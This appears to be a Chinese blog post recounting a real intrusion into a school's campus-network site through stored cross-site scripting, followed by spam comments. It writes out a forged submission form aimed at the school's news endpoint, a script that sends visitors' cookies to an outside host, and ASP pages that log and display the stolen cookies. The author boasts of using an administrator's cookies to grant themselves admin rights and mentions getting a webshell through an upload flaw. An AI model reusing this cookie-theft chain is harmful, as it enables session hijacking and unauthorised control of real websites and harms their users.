XSS入侵校园网

  下面介绍一下XSS跨站脚本入侵方式..这种攻击方式其实很流行,但并不是靠工具能实现的,所以一直没有”大众化”.网上很多关于跨站的文章,但大多数只是弹出一个”XSS”.这其实没有什么意义.这就相当于运行程序时弹出一个内存错误的对话框,但你是否意识到你发现了一个缢出漏洞呢?
下面拿我所在学校的一个校园网详细讲解一下攻击入侵过程.

  首先,网站使用的在线编辑器是FCKEDITOR,在提交新闻时,如果里面包含SCRIPT标签,会被过滤..但过滤是在客户端过滤的,经测试,网站没有禁止从外部提交数据.这样,我们在本地构造一个表单,看看是否能提交<script>标签.
<form action=”http://42.neusoft.edu.cn/www/publish/PubNews.do.x” method=”post” name=”theForm” onSubmit=”return validator()”>
<table width=”100%” border=”0″ cellspacing=”0″ align=”left”>
<tr>
<td width=”70%” valign=”top” id=”context”>
<div id=”pbar”>
<img src=”images/ico.gif” />
发布到分类:
<select name=”cid” id=”cid” onchange=”Access.hasClassRight(‘TopicStyle’,this.value,accesscallback)”>
<option value=”0″>
请选择文章分类
</option>

<option value=”5″ >
体育
…….
<option value=”193″ >
软件
</select>

</div>
<div class=”anews”>
<div class=”title”>
<strong style=”float:left”>文章标题:<textarea name=”title” type=”text” id=”title” size=”40″ msg=”请输入新闻标题”></textarea>
</strong>
<div style=”float:left;display:none” id=”topicstyle”>
</div>
<div>
<div><textarea type=”” id=”text” name=”text” value=”dd”></textarea><input type=”” id=”text___Config” value=””></div>
</div>
<input type=”submit” name=”Submit” value=”确认提交” />
<input type=”reset” name=”Submit2″ value=”重新填写” />
</div>
经测试,<script>能提交上去,这样我们就可以做很多事情了.比如挂木马,放窗口炸弹等..我们要做的事是取COOKIES.
现在的网站一般都是通过COOKIES进行用户验证的,如果我们得到了管理员的COOKIES,自然也享受管理员的权限.
校园网的COOKIES结构是这样的:
userName=*******; password=****************; JSESSIONID=E978968BF9E6008FE48EC8B2AEEBD92C
其中userName是用户ID,password是32位MD5加密的密码…
我们用两个简单的ASP和一小段JS完成操作.

<script language=”javascript”>function getURL(s) {var image = new Image();image.style.width = 0;image.style.height = 0;image.src = s;}getURL(“http://www.tianyus.com/42/js.asp?coo=”+encodeURIComponent(document.cookie));</script>
代码相当于取用户的COOKIES,然后以GET方式发送到 http://www.tianyus.com/42/js.asp

下面发表一篇文章,插入我们的代码:

下面编辑js.asp,将得到的COOKIES写进数据库
<%
Dim cn
Set cn = Server.CreateObject(“ADODB.Connection”)
cn.Open “DRIVER={Microsoft Access Driver (*.mdb)};” & _
“DBQ=”&Server.MapPath(“js.mdb”)
coo=request.QueryString(“coo”)
cn.execute(“insert into [coo](cookies) values(‘”&coo&”‘)”)
cn.close
set cn=nothing
%>

为了方便我们建立一个see.asp显示得到的COOKIES
<%
Dim cn
Set cn = Server.CreateObject(“ADODB.Connection”)
cn.Open “DRIVER={Microsoft Access Driver (*.mdb)};” & _
“DBQ=”&Server.MapPath(“js.mdb”)
%>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
<title>无标题文档</title>
</head>
<body>
<table width=”760″ border=”1″ cellspacing=”4″>
<%
set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from [coo]”,cn,1
do while not rs.eof
%>
<tr>
<td><%=rs(0)%></td>
<td><%=rs(1)%></td>
</tr>
<%
rs.movenext
loop
%>
<%
rs.close
set rs=nothing
cn.close
set cn=nothing
%>
</table>
</body>
</html>
做完了这些,我就去睡觉了..第二天快中午才起来,看到我这里躺着N个人的COOKIES…
筛选出管理员的COOKIES,然后用他们的COOKIES登陆网站,把自己的帐号加到了管理员组,再新建个”网络高手”用户组耍了一下.之后我就去考试了..晚上回来,N个人要加我QQ.
某人跟我聊了一会,答应他以后发现什么漏洞及时告诉他..

没想到第二天就发现了一个比上面还严重的漏洞,上传头像的地方可以上传任何JSP文件..这下倒好,直接拿到WEB SHELL了..
42shell

cheap flights2020-08-24 23:53:12

I believe this is among the so much important information for
me. And i’m satisfied reading your article.
However wanna commentary on some basic things, The site style is perfect,
the articles is truly great : D. Excellent activity, cheers 2CSYEon cheap flights

cheap flights2020-08-26 18:17:07

Appreciate this post. Let me try it out.
2CSYEon cheap flights

cheap flights2020-08-26 21:52:22

Hello There. I found your blog using msn. This is a very well written article.
I will make sure to bookmark it and come back to read more
of your useful info. Thanks for the post.
I’ll certainly comeback.

cheap flights2020-08-27 8:08:30

Great post. I was checking continuously this blog and I am impressed!
Very helpful information specifically the ultimate section 🙂 I deal with such info a lot.
I was seeking this certain information for a very long time.

Thanks and best of luck.

cheap flights2020-08-27 15:20:54

Hello! This is my first visit to your blog! We are a group of volunteers and starting a new initiative in a community in the same niche.
Your blog provided us useful information to work on. You have done a extraordinary job!

black mass2020-08-31 10:12:19

Hey there! This is my first comment here so I just wanted to give a
quick shout out and tell you I genuinely enjoy reading through your articles.

Can you suggest any other blogs/websites/forums that deal with
the same subjects? Thanks a ton!

buy cialis online2020-10-11 20:17:34

Order cialis buy cialis online buy viagra

cbd for sleep2021-02-22 19:51:30

Greetings! I’ve been reading your website for a while now and
finally got the bravery to go ahead and give you a shout out from Houston Texas!

Just wanted to say keep up the great work!

CBD gummies for sale2021-02-24 6:00:59

You should take part in a contest for one of the finest blogs on the web.

I will highly recommend this web site!

best CBD for dogs2021-02-24 10:57:06

I’m no longer sure the place you’re getting your
info, but good topic. I must spend some time finding out
much more or figuring out more. Thank you for magnificent info I was in search
of this information for my mission.

CBD for dogs2021-02-24 11:02:59

It’s going to be end of mine day, however before end
I am reading this fantastic post to increase my know-how.

CBD oil2021-02-24 13:17:22

Hello to all, it’s really a pleasant for me to visit this website, it consists of useful Information.

best CBD gummies2021-02-25 5:29:56

It’s going to be ending of mine day, however before finish I am reading this enormous
article to improve my know-how.

cbd anxiety2021-02-25 12:29:12

Hey would you mind letting me know which web host you’re using?
I’ve loaded your blog in 3 completely different internet browsers and
I must say this blog loads a lot faster then most.
Can you recommend a good internet hosting provider at a fair price?
Kudos, I appreciate it!

验证码